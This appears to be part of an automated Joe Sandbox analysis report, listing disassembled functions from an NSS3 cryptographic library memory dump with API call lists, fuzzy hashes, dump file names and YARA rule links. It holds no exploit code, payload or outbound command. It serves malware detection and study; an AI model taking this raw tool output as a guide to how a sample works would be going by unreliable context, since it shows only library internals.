Opcode Fuzzy Hash: 6e35576eca51e2962ee11cdfe7091f87acce765efe4dc6d67c6aeacfc563b9c3
Instruction Fuzzy Hash: 26A12A719086019BEB008F24DC45B5B32A5EB8530CF2A8D39E959CBB81E735F8C9C793

Function 6CA9AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9AF39
PR_Unlock.NSS3(?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9AF69
TlsGetValue.KERNEL32 ref: 6CA9B06B
EnterCriticalSection.KERNEL32(?), ref: 6CA9B083
PR_Unlock.NSS3(?), ref: 6CA9B0A4
TlsGetValue.KERNEL32 ref: 6CA9B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CA9B0D9
PR_Unlock.NSS3 ref: 6CA9B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9B182

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA9B177

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CA7AB95,00000000,?,00000000,00000000,00000000), ref: 6CA9B1C2

Part of subcall function 6CAC1560: TlsGetValue.KERNEL32(00000000,?,6CA90844,?), ref: 6CAC157A
Part of subcall function 6CAC1560: EnterCriticalSection.KERNEL32(?,?,?,6CA90844,?), ref: 6CAC158F
Part of subcall function 6CAC1560: PR_Unlock.NSS3(?,?,?,?,6CA90844,?), ref: 6CAC15B2

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 8f32bc8c1ca6f589102b51f061089cd3cd2127c143a4ceecf249ffed6becfb09
Instruction ID: 943dd1ec00aa2f71e0122d05fa890580ce0871fa7ccdec73800c0bd14da4733c
Opcode Fuzzy Hash: 8f32bc8c1ca6f589102b51f061089cd3cd2127c143a4ceecf249ffed6becfb09
Instruction Fuzzy Hash: CEA1B2B5E002059BEF009F64ED42BEEB7B4EF08308F144125E909A7751E731E9D9CBA1

Function 6CAEAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAEADB1

Part of subcall function 6CACBE30: SECOID_FindOID_Util.NSS3(6CA8311B,00000000,?,6CA8311B,?), ref: 6CACBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CAEADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAEAE08

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAEAE25
PL_FreeArenaPool.NSS3 ref: 6CAEAE63
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CAEAE4D

Part of subcall function 6C9F4C70: TlsGetValue.KERNEL32(?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4C97
Part of subcall function 6C9F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CB0
Part of subcall function 6C9F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C9F3921,6CBD14E4,6CB3CC70), ref: 6C9F4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAEAE93
PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CAEAECC
PL_FreeArenaPool.NSS3 ref: 6CAEAEDE
PL_FinishArenaPool.NSS3 ref: 6CAEAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAEAEF5
PL_FinishArenaPool.NSS3 ref: 6CAEAF16

Strings

security, xrefs: 6CAEADEE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 20e6d20a3ac8de34a08bee5914f2deebe254e12e6de18d9681d962a683de6ac1
Instruction ID: 49f6c974631a993568e8b27bcfd175d1631cfe8e9b9e82841b7e913aa799c5ab
Opcode Fuzzy Hash: 20e6d20a3ac8de34a08bee5914f2deebe254e12e6de18d9681d962a683de6ac1
Instruction Fuzzy Hash: 92417AB290422067E7204B189C44BAA36BAAF4A31CF180525E81593F41F735AEC8D7E3

Function 6CADE8C0 Relevance: 22.9, APIs: 15, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6CADE853,?,FFFFFFFF,?,?,6CADB0CC,?,6CADB4A0,?,00000000), ref: 6CADE8D9

Part of subcall function 6CAD0D30: calloc.MOZGLUE ref: 6CAD0D50
Part of subcall function 6CAD0D30: TlsGetValue.KERNEL32 ref: 6CAD0D6D

Part of subcall function 6CADC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CADDAE2,?), ref: 6CADC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6CADE972
PORT_ArenaMark_Util.NSS3(?), ref: 6CADE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CADEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CADEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CADEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CADEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6CADEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CADEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6CADEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6CADEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6CADEBEC
free.MOZGLUE(00000000), ref: 6CADEC58

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID:
API String ID: 759478663-0
Opcode ID: 569eb4361bbc7a38d0e998ce9b8d001cdf4d28a5088569c26c6a06d51caed68c
Instruction ID: df98677004fdbf4388ff4cffbe90b31135c365ca0fb680bdcba4100c876d5d01
Opcode Fuzzy Hash: 569eb4361bbc7a38d0e998ce9b8d001cdf4d28a5088569c26c6a06d51caed68c
Instruction Fuzzy Hash: CAC186B5E012059FEB00CF69D985BAEB7F4AF04318F1A4469E90697B51E731F884CBD1

Function 6CAB29A0 Relevance: 22.8, APIs: 15, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,6CA86A5E,00000001,00000000,?,6CA86540,?,0000000D,00000000), ref: 6CAB2A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA86A5E,00000001,00000000,?,6CA86540,?,0000000D,00000000), ref: 6CAB2A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6CA86A5E,00000001,00000000,?,6CA86540,?,0000000D), ref: 6CAB2A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA86A5E,00000001), ref: 6CAB2AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA86A5E,00000001,00000000), ref: 6CAB2ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA86A5E,00000001), ref: 6CAB2ADF
PR_Unlock.NSS3(?), ref: 6CAB2B38
PR_Unlock.NSS3(?), ref: 6CAB2B8B

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,6CA86A5E,00000001,00000000,?,6CA86540,?,0000000D,00000000,?), ref: 6CAB2CA2

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
String ID:
API String ID: 2580468248-0
Opcode ID: ebdddf52f8e7e2a14546c2709c461950cac5449bba2c24a7d8820aba1553ac1d
Instruction ID: bc6fd725e70d0b6e75eeabe5c79ae302f0b78d51766858a6c28bc0fe0c05292b
Opcode Fuzzy Hash: ebdddf52f8e7e2a14546c2709c461950cac5449bba2c24a7d8820aba1553ac1d
Instruction Fuzzy Hash: E7B1D275D006059FDB11DF68D988B9AB7B8FF09308F18862AE845B7B11D731F984CB91

Function 6CB8AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB39890: TlsGetValue.KERNEL32(?,?,?,6CB397EB), ref: 6CB3989E

EnterCriticalSection.KERNEL32(?), ref: 6CB8AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CB8AFCE
PR_SetPollableEvent.NSS3(?), ref: 6CB8AFD9
EnterCriticalSection.KERNEL32(?), ref: 6CB8AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CB8B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CB8B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CB8B070
PR_JoinThread.NSS3(?), ref: 6CB8B07B
free.MOZGLUE(?), ref: 6CB8B084
EnterCriticalSection.KERNEL32(?), ref: 6CB8B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CB8B0C4
PR_JoinThread.NSS3(?), ref: 6CB8B0F3
free.MOZGLUE(?), ref: 6CB8B0FC
PR_JoinThread.NSS3(?), ref: 6CB8B137
free.MOZGLUE(?), ref: 6CB8B140

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 5bae4841acb61c1bcf2dba25f572859dfb4e1d4a1bfd6b41b172c2a6a4eec4bf
Instruction ID: 438240ce275532a07802ee580462f0944940c076001a83a9ca15971ccd8a1bc8
Opcode Fuzzy Hash: 5bae4841acb61c1bcf2dba25f572859dfb4e1d4a1bfd6b41b172c2a6a4eec4bf
Instruction Fuzzy Hash: C49191B5901651CFCB00DF25C88084ABBF1FF5935872985A9D8199BB22E732FD4ACF81

Function 6CB05CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6CB02BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB02BF0
Part of subcall function 6CB02BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB02C07
Part of subcall function 6CB02BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB02C1E
Part of subcall function 6CB02BE0: free.MOZGLUE(?,00000000,00000000,?,6CB02A28,00000060,00000001), ref: 6CB02C4A

free.MOZGLUE(?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05D0F
free.MOZGLUE(?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05D4E
free.MOZGLUE(?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05D62
free.MOZGLUE(?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05D85
free.MOZGLUE(?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05D99
free.MOZGLUE(?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB05E3E
free.MOZGLUE(?,?,?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB05E47
free.MOZGLUE(?,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB05E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CB0AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB05E78
free.MOZGLUE(?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB05EB9
free.MOZGLUE(?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB05EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB05F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB0AAD4), ref: 6CB05F4B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 7d8a6ff6e3b0f04218251788a4164ce9087343bf6f3f691eec813da74f2e8f53
Instruction ID: 24622b0811065910d1d38aa3e829483fcbfa295f213f21f0a5af8907eeaf3dd2
Opcode Fuzzy Hash: 7d8a6ff6e3b0f04218251788a4164ce9087343bf6f3f691eec813da74f2e8f53
Instruction Fuzzy Hash: D071A5B5A00B419FD700DF24D888A9277F5FF49308F148629E86E87B11E731F959CB56

Function 6CA88DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CA88E22
EnterCriticalSection.KERNEL32(?), ref: 6CA88E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CA88E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CA88E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA88E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA88EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CA88EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CA88EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CA88F00
free.MOZGLUE(?), ref: 6CA88F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CA88F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CA88F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CA88F5B
PR_Unlock.NSS3(?), ref: 6CA88F72
PR_Unlock.NSS3(?), ref: 6CA88F82

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 1722bf4cd2767dcdd3a1e98578a2a76e12247ee3c1ef94646dd36dba52ad0538
Instruction ID: 23aa521791d10d7592dae0f225e8e653ad4430eda1b5c687b3cd07a5345cbcaa
Opcode Fuzzy Hash: 1722bf4cd2767dcdd3a1e98578a2a76e12247ee3c1ef94646dd36dba52ad0538
Instruction Fuzzy Hash: 4B513BB2D022159FDB009F68CC849AEB7B9EF55358F19412AEC189B700EB31ED8487E1

Function 6CAACE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CAACE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CAACEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CAACED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CAACEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CAACF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CAACF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CAACF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CAACF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CAACF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CAACFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CAACFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CAACFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CAACFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CAAD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CAAD021

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: f43f3c7f9b5922264acb4d3d4b7c85837073af361780a4d0fca366454af65607
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 3E318771B1291027EF0D14975D21BDE245A4B6530EF481138FD4BF67C0FA85979B42E6

Function 6CB80FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CB81000

Part of subcall function 6CB39BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA61A48), ref: 6CB39BB3
Part of subcall function 6CB39BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA61A48), ref: 6CB39BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CB81016

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_Unlock.NSS3(?), ref: 6CB81021

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CB81046
PR_Unlock.NSS3(?), ref: 6CB8106B
PR_Lock.NSS3 ref: 6CB81079
PR_Unlock.NSS3 ref: 6CB81096
free.MOZGLUE(?), ref: 6CB810A7
free.MOZGLUE(?), ref: 6CB810B4
PR_DestroyCondVar.NSS3(?), ref: 6CB810BF
PR_DestroyCondVar.NSS3(?), ref: 6CB810CA
PR_DestroyCondVar.NSS3(?), ref: 6CB810D5
PR_DestroyCondVar.NSS3(?), ref: 6CB810E0
PR_DestroyLock.NSS3(?), ref: 6CB810EB
free.MOZGLUE(?), ref: 6CB81105

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: e334eb6ac56e5a9b790205464ac504d43ff71d04affb837817d1b9278f03baf2
Instruction ID: e3f35ee672edd1843298132f84678f5b2dbd329a64044fb6c65b6e396ca767a6
Opcode Fuzzy Hash: e334eb6ac56e5a9b790205464ac504d43ff71d04affb837817d1b9278f03baf2
Instruction Fuzzy Hash: C231ADB5906492ABD702AF15FD41A49B775FF01358B184130E81913F61E732F9B8DBC2

Function 6CA95E60 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA95ECF
EnterCriticalSection.KERNEL32(?), ref: 6CA95EE3
PR_Unlock.NSS3(?), ref: 6CA95F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6CA95FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6CA961F4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
